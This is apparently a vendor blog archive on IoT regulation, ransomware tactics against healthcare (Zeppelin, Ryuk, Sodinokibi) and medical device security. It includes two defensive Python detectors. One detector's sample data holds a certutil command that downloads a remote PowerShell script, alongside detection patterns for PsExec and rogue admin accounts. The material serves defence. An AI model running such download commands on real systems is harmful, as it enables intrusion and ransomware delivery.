- Huawei Technologies Co.
- ZTE Corp.
- Hytera Communications Corp.
- Hangzhou Hikvision Digital Technology Co.
- Dahua Technology Co.
Month: October 2020
Internet of Things – Digital Transformation
Merriam-Webster’s definition of the Internet of Things (IoT) is, “the networking capability that allows information to be sent to and received from objects and devices (such as fixtures and kitchen appliances) using the Internet”. Kevin Ashton coined the term in 1999, and since then IoT has grown expansively; yet while these devices have been around for decades, the regulations governing them remain ineffectual.
And, while IDC estimates that there will be 41.6 billion connected IoT devices, or “things,” generating 79.4 zettabytes (ZB) of data in 2025, we are still not able to build IoT devices with security in mind.
The United States
Recently, a bipartisan bill, the IoT Cybersecurity Improvement Act, from Reps. Will Hurd (R-Texas) and Robin Kelly (D-Ill.), along with Sens. Mark Warner (D-Va.) and Cory Gardner (R-Colo.), was passed by the House but must now go to the Senate before reaching the President’s desk. The bill took more than three years to get to the House of Representatives, and in that time more than 6 billion IoT devices entered the market.
While the bill would set the minimum security standards for IoT devices connected to federal networks, it would also require the National Institute of Standards and Technology (NIST) to set best practices for device security, the Office of Management and Budget to create guidance for agencies to meet, and require the Department of Homeland Security to publish guidance on coordinated vulnerability disclosures for contractors and vendors.
The Food and Drug Administration (FDA) is trying to achieve medical device security and makes it well known on their website what they aim to accomplish:
The U.S. Food and Drug Administration (FDA) regulates medical devices and works aggressively to reduce cybersecurity risks in what is a rapidly changing environment. It is a responsibility the Agency shares with device makers, hospitals, health care providers, patients, security researchers, and other government agencies, including the U.S. Department of Homeland Security and U.S. Department of Commerce.
The FDA provides guidance to help manufacturers design and maintain products that are cyber secure. And on behalf of patients, the FDA urges manufacturers to monitor and assess cybersecurity vulnerability risks, and to be proactive about disclosing vulnerabilities and solutions to address them.
The medical device cybersecurity guidance by the FDA was last updated in 2018. While the FDA releases a list of vulnerabilities, its guidance points organizations to the MITRE Corporation’s Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook, to which the FDA contributed.
Much like with regulatory compliance standards around sensitive data, in the United States the individual states are leading the charge again. California and Oregon have enacted legislation that mandates that manufacturers supplying IoT devices do so with “reasonable security features.” In addition to California and Oregon, eight additional states are considering legislation.
The United States is likely to not see real meaningful regulatory compliance standards for IoT devices until the impact has already hit most organizations and homes. Compare that to the European Union (EU) and what they have in place and are working to put in place.
The European Union (EU)
In June of this year the EU introduced a new cybersecurity standard for consumer IoT products (ETSI EN 303 645 V2.1.1), in the hope of encouraging better security practices and more manufacturers adopting a security-by-design principle when developing new connected consumer products.
The standard consists of 13 provisions:
- No universal default passwords
- Implement a means to manage reports of vulnerabilities
- Keep software updated
- Securely store sensitive security parameters
- Communicate securely
- Minimize exposed attack surfaces
- Ensure software integrity
- Ensure that personal data is secure
- Make systems resilient to outages
- Examine system telemetry data
- Make it easy for users to delete user data
- Make installation and maintenance of devices easy
- Validate input data
In addition to ETSI EN 303 645 V2.1.1, the EU also explicitly addresses medical devices in the European Medical Device Regulation (EU MDR). Much like the US FDA’s UDI, it seeks to ensure high standards of quality and safety for medical devices being produced in or supplied into Europe. With the introduction of this directive, devices entering the EU will have:
- Stricter pre-market control of high-risk devices at an EU level
- The inclusion of certain aesthetic products which present the same characteristics and risk profile as equivalent medical devices
- A new risk classification system for diagnostic medical devices based on international guidance
- Improved transparency through the establishment of a comprehensive EU database of medical devices
- Device traceability through the supply chain from its manufacturer through to the final user
- An EU-wide requirement for an ‘implant card’ to be provided to patients containing information about implanted medical devices
- The reinforcement of the rules on clinical data and clinical studies on devices
- Manufacturers to collect data about the real-life use of their devices
- Improved coordination between EU Member States
And, now with Brexit, what happens with the United Kingdom (UK) come December 31, 2020 and the IoT regulatory compliance standards? While the UK remains subject to EU law, it is no longer part of the EU’s political bodies or institutions. Will the Department for Digital, Culture, Media & Sport (DCMS) serve as the governing body for IoT device security?
The United Kingdom (UK)
In June of 2020 the UK DCMS addressed the need for cybersecurity as a fundamental element in the building of IoT devices. It is enacting a product assurance scheme to mark approved IoT devices with an assurance label or kitemark demonstrating that the product has undergone independent testing or a robust, accredited self-assessment process. The ultimate goal is that consumers would purchase approved IoT devices rather than unapproved ones, and that retailers would only sell approved devices.
DCMS has been taking forward multiple initiatives to address the matter, including:
- Publishing the Code of Practice for Consumer IoT Security
- Committing to taking forward new legislation to mandate core aspects of the Code
- Leading the development of industry standard ETSI EN 303 645
“The UK Government looks forward to continuing to work with industry and all interested stakeholders to ensure that the UK is the safest place to be online.”
While the EU and UK continue to lead the charge in regulatory compliance standards to protect citizen and resident data, they are also years ahead of the US in addressing IoT device security. The fundamental issues still remain: can we create a global culture where we put securing our data first, both by properly building IoT devices and by holding device manufacturers accountable in our procurement of devices?
Early in my career, a mentor of mine said, “you either participate in this [connected] world, or you don’t. There is no middle area.” We were discussing social applications and the volume of data that is shared both professionally (what tools your team uses) and personally (where you live, what you consume, your preferences, etc.). When I think back to that conversation, which I remember vividly as a turning point in how I view data, I am reminded that the same principle applies to the devices that carry sensitive data. Which, inevitably, brings us to this week, where we focus on National Cybersecurity Awareness Month’s (NCSAM) theme of, “If You Connect It, Protect It”.
This week’s theme description:
If you connect it, protect it. The line between our online and offline lives is indistinguishable. This network of connections creates both opportunities and challenges for individuals and organizations across the globe. The first week of Cybersecurity Awareness Month will highlight the ways in which internet-connected devices have impacted our lives and will empower all users to own their role in security by taking steps to reduce their risks.
You Either Have [Connected] Devices, Or You Don’t
While not all devices are created with the same intent, all devices are created to solve a want or need. One thing most devices are not created with is security in mind. Connected devices often come with default passwords that go unchanged, run outdated operating systems, and send data via insecure protocols. Whether it is a personal device (e.g. cell phone, smart watch) or a device in your office (e.g. MRI machines, HVAC controls, workstations), all must be accounted for, their risks must be known, and high-risk and vulnerable devices must be secured properly.
Steps to securing your IoT devices:
- Have an accurate inventory of all connected devices – you can’t protect what you don’t know about, therefore security starts with granular visibility of all your devices. This is a challenge for organizations because these devices are sometimes offline, they connect via wired and wireless networks, and they are sometimes procured and managed by users outside the purview of security. Accurate asset inventory includes not only an understanding of details such as make, model, serial number and location, but also associated vulnerabilities and recalls.
- Understand how those devices are behaving – to secure IoT devices, you need to understand what “good behavior” looks like. This allows you to baseline what normal patterns of communications look like in your specific environment, so you can identify anomalous and malicious patterns such as C2 communications or abnormal RDP/SMB lateral movement.
- Automate the appropriate response for securing devices on your network – with a complete inventory and an understanding of how devices behave on your network, you can automate actions to enforce proactive segmentation policies or trigger the appropriate workflows (CMMS, CMDB, IR, etc.).
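The three steps above (inventory, behavioral baseline, automated response) can be reduced to a small piece of detection logic. The following is an added example, not Ordr’s code or any part of its product: it learns which peers and ports each device normally talks to from a learning period, then flags two of the anomalies the post calls out, a device opening a new SMB/RDP/RPC connection it never used before, and one source sweeping many internal hosts on one port. All flow records, addresses, and the threshold values are constructed for illustration; a real deployment would feed NetFlow/IPFIX, Zeek connection logs, or span-port traffic into the same functions.

```python
"""Baseline-and-anomaly detection over connected-device flow records.

Added example (not Ordr's code). Flow records are constructed tuples of
(timestamp_seconds, src_ip, dst_ip, dst_port); thresholds are assumptions.
"""
from collections import defaultdict

# Ports commonly used for lateral movement (SMB, RDP, MS-RPC, WinRM).
LATERAL_PORTS = {445: "SMB", 3389: "RDP", 135: "RPC", 5985: "WinRM"}
SCAN_THRESHOLD = 5     # distinct peers on one port from one source within a window
WINDOW_SECONDS = 60    # sliding window used for the scan check

# Constructed learning-period flows: what "good behavior" looks like.
BASELINE_FLOWS = [
    (0, "10.1.1.20", "10.1.2.5", 443),    # infusion pump -> vendor gateway (HTTPS)
    (1, "10.1.1.20", "10.1.2.10", 104),   # pump -> PACS (DICOM)
    (2, "10.1.1.21", "10.1.2.5", 443),    # second pump -> vendor gateway
    (3, "10.1.1.30", "10.1.2.50", 445),   # workstation -> file server (normal SMB)
]

# Constructed observation window containing two anomalies.
OBSERVED_FLOWS = [
    (100, "10.1.1.20", "10.1.2.5", 443),   # normal, in baseline
    (101, "10.1.1.20", "10.1.2.50", 445),  # pump speaking SMB to a file server: new
    (102, "10.1.1.30", "10.1.2.50", 445),  # normal
    (110, "10.1.1.30", "10.1.3.1", 3389),  # start of an RDP sweep from the workstation
    (111, "10.1.1.30", "10.1.3.2", 3389),
    (112, "10.1.1.30", "10.1.3.3", 3389),
    (113, "10.1.1.30", "10.1.3.4", 3389),
    (114, "10.1.1.30", "10.1.3.5", 3389),
]


def build_baseline(flows):
    """Map each source device to the set of (dst, port) pairs seen while learning."""
    baseline = defaultdict(set)
    for _ts, src, dst, port in flows:
        baseline[src].add((dst, port))
    return baseline


def detect_new_lateral_flows(baseline, flows):
    """Flag flows on lateral-movement ports that the source never used in baseline."""
    findings = []
    for ts, src, dst, port in flows:
        if port in LATERAL_PORTS and (dst, port) not in baseline.get(src, set()):
            findings.append({"time": ts, "src": src, "dst": dst, "port": port,
                             "reason": f"new {LATERAL_PORTS[port]} peer outside baseline"})
    return findings


def detect_sequential_scans(flows, threshold=SCAN_THRESHOLD, window=WINDOW_SECONDS):
    """Flag a source that reaches >= threshold distinct hosts on one port within a window."""
    by_src_port = defaultdict(list)
    for ts, src, dst, port in flows:
        by_src_port[(src, port)].append((ts, dst))
    findings = []
    for (src, port), events in by_src_port.items():
        events.sort()
        for i, (start, _dst) in enumerate(events):
            peers = {dst for ts, dst in events[i:] if ts - start <= window}
            if len(peers) >= threshold:
                findings.append({"src": src, "port": port, "peers": len(peers),
                                 "reason": "sequential scan"})
                break  # one finding per (source, port) is enough
    return findings


def main():
    baseline = build_baseline(BASELINE_FLOWS)
    for finding in detect_new_lateral_flows(baseline, OBSERVED_FLOWS):
        print(finding)
    for finding in detect_sequential_scans(OBSERVED_FLOWS):
        print(finding)


if __name__ == "__main__":
    main()
```

Run against the constructed data, the pump’s new SMB connection and the workstation’s RDP sweep are both reported; the sweep additionally appears as five “new RDP peer” flows, which is exactly the redundancy a segmentation policy that only permits each device’s sanctioned communications would remove.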
This week’s theme, “If You Connect It, Protect It” fits well with the Ordr mission of protecting all connected devices and creating a safer network infrastructure. Recently, we began an IoT Discovery Program that allows you to:
- Gain high-fidelity visibility into devices that you may not know are in your network
- Understand risks including communication patterns and vulnerabilities
- Discover usage patterns for your devices
- Map these devices to your Layer 2 and Layer 3 architecture
- Identify appropriate segmentation policies to secure your devices
If you feel this program would be a good fit for your organization, register here: https://ordr.net/sensor/
Through the Cybersecurity Awareness month of October, we will be releasing a set of blogs to focus on weekly topics. Next Tuesday, catch our blog on “Securing Devices at Home and Work”.
Tactics, Techniques, Procedures and Recommendations of How to Triage
Perspective on the increase in ransomware attacks
Ransomware continues to make the headlines as researchers warn of a seven-fold increase compared to 2019. Healthcare is a very lucrative target, with attacks increasing by 350% in Q4 of 2019 (compared to Q4 2018) and continuing to rise through 2020. The pandemic provided a significant opportunity for any threat actor looking to target healthcare providers, as the focus shifted from a holistic look at patient care, health outcomes, experience, revenue, and security to health outcomes alone. In addition, there has been a mass influx of connected devices deployed in facilities without the proper purview of IT and Security teams, leading to incomplete asset inventories and a lack of clear visibility into how and where devices are communicating.
Ransomware as a viable threat to healthcare organizations has led to sophisticated attackers with complex and targeted campaigns. The recent wave of ransomware campaigns looks more like a hands-on hack than an autonomous piece of malware propagating across the network. The operators facilitating the recent ransomware attacks are heavily incentivized to make sure their malware is extremely effective at propagating across diverse networks. We have seen simple pieces of malware like trojan droppers install remote control functionality and backdoors which allow these ransomware operators to get onto the healthcare network and then run tools like Cobalt Strike to escalate their privileges to admin. Once admin privileges have been gained, these ransomware operators begin turning off the malware detection and incident response programs on the infected devices. We’ve seen these operators use tools like Mimikatz to dump memory and gather local admin passwords or common user passwords on systems. Once common passwords have been gathered, the network is theirs for the taking. In organizations that use Remote Desktop Protocol (RDP) on workstations and servers, we’ve seen these compromised local administrator accounts used to install and distribute the ransomware. We’ve also seen these attackers run PsExec and PowerShell scripts remotely by mounting remote shares (like IPC$ and C$) using the compromised credentials. If local or commonly utilized credentials cannot be gathered from the initially infected host, we’ve seen them pivot to other hosts or use common exploit kits to propagate throughout the network. These operators are skilled, and unfortunately most healthcare providers and healthcare delivery organizations are trivial to compromise once these ransomware operators are inside.
Healthcare organizations that have vulnerable services on the edge of their network get compromised easily by autonomous scripts that are constantly scanning the internet. Once compromised, the script drops a payload that includes all of the tools the operators need for privilege escalation, exploitation, and lateral movement. Many healthcare organizations have flat networks, and utilize common local administrator accounts on largely unpatched systems. It is common to find legacy and largely unsupported operating systems like Windows XP running on both workstations and critical medical devices which cannot be patched and are running vulnerable services like SMBv1 that are available to the entire network. Simply put, once the initial compromise happens, it is largely trivial for these ransomware operators to infect an entire healthcare organization within a few hours.
Let’s discuss the 3 most common ransomware campaigns that are targeting healthcare providers and healthcare delivery organizations and what their TTPs are:
The Zeppelin ransomware is believed to be operated by a Russian cybercrime group; however, very little is known about the operators. The initial infection code checks that it will not infect machines located in Belarus, Kazakhstan, the Russian Federation, or Ukraine. The Zeppelin ransomware code is largely based on a purchasable ransomware variant known as VegaLocker, which is available on multiple hacking and ransomware-as-a-service websites and forums. The initial Zeppelin infections began at the beginning of 2019.
What does a Zeppelin Compromise typically look like (TTPs):
- Typically, a spam or phishing email is received by an organization that includes an infected document that downloads and installs malware onto the system.
- Some initial infections appear to be Vidar Spyware or the CobaltStrike penetration tester toolkit.
- Recently the Zeppelin operators appear to be exploiting vulnerable RDP, Apache Tomcat, and Oracle Weblogic servers available on the internet.
- Once connected to the infected system the operators will install PowerShell scripts and PsExec.
- In some Zeppelin instances a legitimate remote desktop application called ScreenConnect is initially installed (if it doesn’t already exist). The Zeppelin operators will connect to the ScreenConnect service and install the PowerShell scripts, privilege escalation tools, and PsExec.
- The Zeppelin operators will run a set of PowerShell Anti-Anti-Virus scripts and turn off logging to prevent detection and subsequently dump memory looking for local accounts that can be used to either propagate throughout the network or compromise the domain controller.
- Typically, the Zeppelin operators attempt to compromise the domain controller, and once compromised they create a domain admin account to distribute the Zeppelin ransomware throughout the network.
- The domain admin account that is typically created is called “SQLSvc”.
- If the domain controller is difficult to compromise, they attempt to distribute the Zeppelin ransomware using compromised credentials dumped from memory of infected systems and propagate through file deployment and execution by PsExec.
- Once on the Domain Controller, they deploy a command to all connected devices to download Anti-Anti-Virus and Anti-Backup scripts along with the Zeppelin ransomware.
- The Zeppelin operators utilize the certutil command on Windows to download and infect machines with the scripts and ransomware.
- Finally, the scripts and Zeppelin ransomware are executed on all connected devices via PsExec.
The Ryuk (aka Conti) ransomware is known to be operated by a Russian cybercrime group. The Ryuk ransomware was largely based on a previous ransomware codebase known as Hermes, which was possibly created by a North Korean hacking group and is purchasable from multiple hacking and ransomware-as-a-service websites and forums. The Russian cybercrime group started targeting healthcare organizations in late 2018.
What does a Ryuk Compromise typically look like (TTPs):
- A spam or phishing email is received by an organization that includes an infected document that drops a trojan downloader/bot that includes several tools for remote access, privilege escalation, and lateral movement.
- The Ryuk operators gain access to the Emotet/TrickBot compromised machine typically through a PowerShell script that launches a reverse shell that connects to the Ryuk operators.
- Once on the infected system the Ryuk operators turn off all PowerShell logging and run Anti-Anti-Virus scripts to prevent detection.
- Common lateral movement, privilege escalation, and exploit kits are downloaded onto the infected machine.
- It is common for the Ryuk operators to utilize the PowerShell Empire post exploitation kit.
- The Ryuk operators dump the infected machine’s memory looking for local accounts that are used on workstations and servers throughout the network.
- If local credentials are not found, the operators will use common exploit kits.
- Lateral movement and infection happen either via RDP or through PsExec.
- Typically, the domain controller is initially targeted and if compromised the domain controllers will typically be used to distribute the scripts and Ryuk ransomware to all connected users/computers.
- Anti-Anti-Virus and Anti-Backup/Recovery scripts are run on soon to be infected machines in order to prevent both detection and recovery from the Ryuk ransomware.
- The Ryuk ransomware is deployed to all machines using PsExec and a local service is created and started to run the Ryuk binary.
- The Ryuk operators sometimes oversee the infection to ensure that it is successful and once infected they start emailing employees informing them of the infection and to reach out to them via an anonymous email where payments are later discussed. The payment amounts typically vary depending on the size and the revenue of the organization that is infected.
Sodinokibi (aka Sodin, REvil) is another ransomware-as-a-service operation which started in April of 2019 and is believed to be created and operated most likely by the same Russian group behind the popular GandCrab ransomware. In early 2019 the Sodinokibi group is believed to have hired affiliate hackers with a guaranteed payment of $50,000 USD and a 60% to 70% cut of the revenue after payments were secured from victims. The developers of this ransomware regularly post updates and new functionality to their code. Once installed, Sodinokibi ransomware initially looks at the computer’s language settings and will not infect if the set language is one used in most former Soviet Union or Middle Eastern countries. The Sodinokibi ransomware has been seen using several TTPs, including manual and automated drive-by compromises using spam/phishing attacks, common exploits, and previously compromised passwords.
What does a Sodinokibi Compromise typically look like (TTPs):
- It is difficult to describe the typical attack method used to deploy the Sodinokibi ransomware as there are several which leads some security professionals to believe that Sodinokibi is being operated by multiple cybercrime organizations.
- The Sodinokibi operators also appear to be exploiting vulnerable WebLogic and RDP servers available on the internet.
- After the initial infection the Sodinokibi operators drop various exploit and privilege escalation kits to move laterally throughout the network.
- Similar to Zeppelin the Sodinokibi operators typically use the certutil command on Windows to download their scripts, exploit kits, and ransomware payload to infected machines.
- Once infected with the Sodinokibi ransomware, the malicious binary deletes all file shadow copies on the infected system and disables recovery mode in order to ensure that the encrypted files cannot be restored from a local backup.
- The Sodinokibi ransomware includes several persistence, Anti-Anti-Virus, and Anti-Backup/Restore functions, making installation easy. This functionality makes it more autonomous for the operators, which is why we sometimes see Sodinokibi installed in simple drive-by attacks on vulnerable internet-facing servers and services.
One concerning tactic that most ransomware as a service operators are starting to employ is to exfiltrate several important files from an infected organization and threaten to both publicly disclose the breach and publish the important documents on their blogs typically hosted on the Dark Web. We’ve seen many ransomware operators publicly announce and release sensitive material for companies that did not pay the ransom.
Recommendations on using Ordr to Protect Against Ransomware
- Discover and identify your weak points
  - Identify devices running legacy versions of Windows that are running SMBv1 (such as Windows XP and Windows 7). The Ordr IoT Discovery Program allows you to quickly identify these devices. In Ordr’s Rise of The Machines Report, we identified that 15-19 percent of our deployments had IoT devices running on legacy operating systems, Windows 7 or older.
  - Identify devices with known vulnerabilities, as attackers will try to exploit them. Use Ordr’s built-in scanner or take advantage of our integration with vulnerability management solutions like Rapid7 and Tenable.
  - Identify high-risk and vulnerable devices that cannot be patched. Using Ordr’s integration with WinRM, you can identify device operating systems and the status of patches.
- Enable proactive segmentation
  - Systems that cannot be patched need to be isolated. Ordr allows you to easily create segmentation policies that restrict devices to only the sanctioned communications required for their functions.
  - Work with Ordr and our firewall and networking infrastructure partners to enforce these segmentation policies in your existing infrastructure.
- Monitor for ransomware indicators
  - Identify anomalous communication using the Ordr Flow Genome. This can include discovery of sequential scans on the internal network, and anomalous SMB, RDP, and RPC communications utilized in lateral movement.
  - Alert on common exploits and known ransomware payload URLs used in lateral movement, such as EternalBlue.
  - Alert on common C2 communications to known ransomware payload servers; when infected machines reach out to these malicious sites, the Ordr product will alert on them.
  - Track user logon/logoff activities using Ordr. Our platform provides a mechanism to pull user logon and logoff activities from Active Directory and also track locally created users. This allows you to ensure the right users have access to vulnerable machines and identify any anomalous user accounts created within the network by threat actors.
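Several of the host-side indicators named in the Zeppelin, Ryuk and Sodinokibi TTP lists above (certutil used as a downloader, a freshly created account such as “SQLSvc” being made a domain admin, and PsExec being used to push the payload) and the account-tracking recommendation in this section can be checked from ordinary Windows event logs. The following is an added example, not Ordr’s code or product logic: it reads a handful of constructed Security and System event records in a simplified JSON-lines shape and raises a finding for each pattern. The field names mirror the real event data for IDs 4688 (process creation), 4720 (account created), 4728 (member added to a security-enabled global group) and 7045 (service installed), but every record, hostname, account and URL here is made up for the demonstration; a real pipeline would read Windows Event Forwarding output or a SIEM export.

```python
"""Detect ransomware-operator indicators in Windows event records.

Added example (not Ordr's code). Event records are constructed JSON lines
with field names modelled on Windows Security/System event data; the hosts,
accounts and URL are invented for illustration.
"""
import json

# Constructed sample events, one JSON object per line.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"EventID": 4688, "Computer": "WS01",
                "NewProcessName": "C:\\Windows\\System32\\certutil.exe",
                "CommandLine": "certutil -urlcache -split -f http://198.51.100.7/x.ps1 x.ps1"}),
    json.dumps({"EventID": 4688, "Computer": "WS02",        # legitimate certutil use
                "NewProcessName": "C:\\Windows\\System32\\certutil.exe",
                "CommandLine": "certutil -verify cert.cer"}),
    json.dumps({"EventID": 4720, "Computer": "DC01",        # new account created
                "TargetUserName": "SQLSvc", "SubjectUserName": "jdoe"}),
    json.dumps({"EventID": 4728, "Computer": "DC01",        # ... and made a domain admin
                "MemberName": "CN=SQLSvc,CN=Users,DC=corp,DC=local",
                "TargetUserName": "Domain Admins", "SubjectUserName": "jdoe"}),
    json.dumps({"EventID": 7045, "Computer": "WS03",        # PsExec service installed
                "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}),
    json.dumps({"EventID": 7045, "Computer": "WS03",        # unrelated service install
                "ServiceName": "Spooler", "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe"}),
])


def parse_events(text):
    """Parse JSON-lines event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _cn_from_dn(distinguished_name):
    """Return the CN of 'CN=SQLSvc,CN=Users,...' (lower-cased); empty string if absent."""
    first = distinguished_name.split(",")[0]
    return first.split("=", 1)[1].strip().lower() if "=" in first else ""


def detect_indicators(events):
    """Return (host, description) findings for the three patterns, in event order."""
    findings = []
    created_accounts = set()   # accounts seen in a 4720 so far (stateful correlation)
    for ev in events:
        eid = ev.get("EventID")
        host = ev.get("Computer", "?")
        if eid == 4688 and ev.get("NewProcessName", "").lower().endswith("certutil.exe"):
            cmd = ev.get("CommandLine", "").lower()
            # certutil fetching a URL is the downloader pattern; -verify is normal use
            if "urlcache" in cmd or "http://" in cmd or "https://" in cmd:
                findings.append((host, "certutil used as a downloader"))
        elif eid == 4720:
            created_accounts.add(ev.get("TargetUserName", "").lower())
        elif eid == 4728 and ev.get("TargetUserName") == "Domain Admins":
            member = _cn_from_dn(ev.get("MemberName", ""))
            if member in created_accounts:
                findings.append((host, f"newly created account '{member}' added to Domain Admins"))
        elif eid == 7045 and ev.get("ServiceName", "").upper() == "PSEXESVC":
            findings.append((host, "PsExec service installed"))
    return findings


def main():
    for host, description in detect_indicators(parse_events(SAMPLE_EVENTS)):
        print(f"{host}: {description}")


if __name__ == "__main__":
    main()
```

The account check is deliberately stateful: a 4728 on its own is routine administration, and a 4720 on its own is routine provisioning, but the two in sequence for the same name is the “create an admin account to distribute the payload” step the Zeppelin and Ryuk write-ups describe. In production the created-account set should expire after a chosen window rather than grow without bound.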
If you’ve already been attacked by ransomware, here are recommendations on how to deal with it, as described previously in my blog here. Note that with ransomware examples in this blog, there are no decryptors available at this time.
If you have questions about ransomware protection, please contact us at email@example.com. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
United States of America – National Cyber Security Awareness Month (NCSAM)
As the Fall weather starts and we begin to overindulge in pumpkin spice lattes and candy, another great seasonal reminder is presented, Cybersecurity Awareness Month! Started in 2004 by the National Cyber Security Division within the United States Department of Homeland Security and the nonprofit National Cyber Security Alliance the dedicated month aims to raise awareness about cybersecurity. The focus is both on how consumers can protect their data and how organizations can take steps to safeguard their infrastructure. Since 2004, we have seen a global adoption of Cybersecurity Awareness Month with Canada and the European Union (EU) joining the US.
European Union – European Cybersecurity Month (ECSM)
The ECSM is dedicated to promoting cybersecurity among citizens and organizations, and to providing up-to-date online security information through awareness raising and sharing of good practices. ‘Think Before U Click’ is the official motto of ECSM 2020.
Canada – Cyber Security Awareness Month (CSAM)
The Canadian CSAM is to inform the public of the importance of cyber security. This campaign is focused on helping all Canadians be more secure online, by being informed and knowing the simple steps to take to protect themselves, their families, their workplace, and their devices. The month is divided into two themes which highlight different aspects of cyber security, focusing on protecting devices.
October 2020 – If You Connect It, Protect It
As we embark on another October of bringing awareness to the importance of cybersecurity, this year’s theme is, “Do Your Part. #BeCyberSmart.” It encourages individuals and organizations to do their part, stressing personal accountability and the importance of organizations taking proactive steps to enhance cybersecurity.
Through the month of October the emphasis will be on “If You Connect It, Protect It,” and we will be releasing a set of blogs to focus on the weekly topics, give tips on how to protect your connected devices, and what the future looks like:
October 6 (Week 1): If You Connect It, Protect It
October 13 (Week 2): Securing Devices at Home and Work
October 20 (Week 3): Securing Internet-Connected Devices in Healthcare
October 27 (Week 4): The Future of Connected Devices
For more information on what you need to know about IoT Security, we’ve created an IoT Knowledge Hub. To learn more about IoT Security, click here.
Listening to Part 1 of the Minnesota HIMSS webinar series Medical Device Security Overview for Healthcare Delivery Organizations with speakers Matt Dimino and Carrie Whysall from CynergisTek, I found the following to be useful information that you can apply to your organization’s security program development.
Medical Device Security Services
Medical devices have important functions and carry sensitive data, making them attractive cyber attack targets. As medical devices become increasingly connected to the internet they are becoming greater security risks. These devices are purchased and utilized by different departments within the organization and can lead to inaccurate asset inventories and unmanaged devices.
Attacks on medical devices can cause disruptions in patient care and possibly result in patient harm. Not only will this result in lower quality care for that patient, it will also affect the organization’s reputation and bottom line.
IoT & IoMT Device Security Challenges
There are a variety of security challenges that come with securing medical devices, and each requires a different solution.
- Culture: There’s a disconnect between IT and Clinical Engineering teams. Each group has minimal experience and knowledge of the other’s work and capabilities.
- Legacy Systems: Many medical devices on networks today are running on outdated operating systems and are kept for long periods of time.
- Unable to Update: Medical devices are often difficult, if not impossible, to patch.
- Medical Device Ecosystem is Complex: The medical device ecosystem is very complex, with devices coming from multiple vendors and software platforms.
- Lack of Security Controls: Many familiar IT security controls don’t apply to medical devices. Administrative and physical controls can be disruptive to patient care and operations.
- Lack of Tools: IT teams have limited tools that work well with medical devices and can scan inventories for vulnerabilities.
- Medical Devices are Proprietary: Medical devices are specialized; with different wireless requirements, hardware and software.
- Insufficient Visibility: Many medical device networks lack adequate visibility of their medical device inventory.
- Inventory Size: Hospitals have about 10 to 15 connected medical devices per bed, and each device has an average of 6.2 vulnerabilities.
Medical Device Security Components
Medical device security should be comprehensive; creating a security program in three stages ensures it will be implementable down the line.
- Risk Assessment: The first step in creating a program is assessing your current security practices. This includes reviewing the current security program practices, installing a passive network scanner, and creating a security risk classification guide. Organizations should also segment devices and decide what teams, whether it be IT or Clinical Engineering, will be remediating vulnerabilities and overseeing different devices.
- Program Development: Next, create a cybersecurity program through adding security practices to pre-existing device management practices. This includes continued surveillance over remediated devices and other assets, as well as standardized device assessment, configuration and incident procedures.
- Program Management: Sustained device management is necessary for medical organizations to stay secure. Assisting in medical device procurement and deployment, vulnerability reporting, and remediation planning should all be performed as part of program management.
How Ordr Can Help
CynergisTek highlighted a passive device scanner as a key tool for creating and automating a medical device security program. Ordr Systems Control Engine (SCE) is able to provide an accurate asset inventory, properly classify devices with the granular detail needed for appropriate workflows, baseline and map device communications, and enable micro-segmentation efforts.
The Ordr SCE gives organizations the power to enable visibility and security of their network-connected devices, with a simple and powerful solution to identify, classify, profile the behavior and risk and automate action for every network-connected device in the enterprise. To learn more about how Ordr can enable an effective IoT security strategy for your organization, request a free sensor.
Look for blog posts covering Part 2 and 3 of the Medical Device Security webinar series in the future. You can watch the full HIMSS webinar here.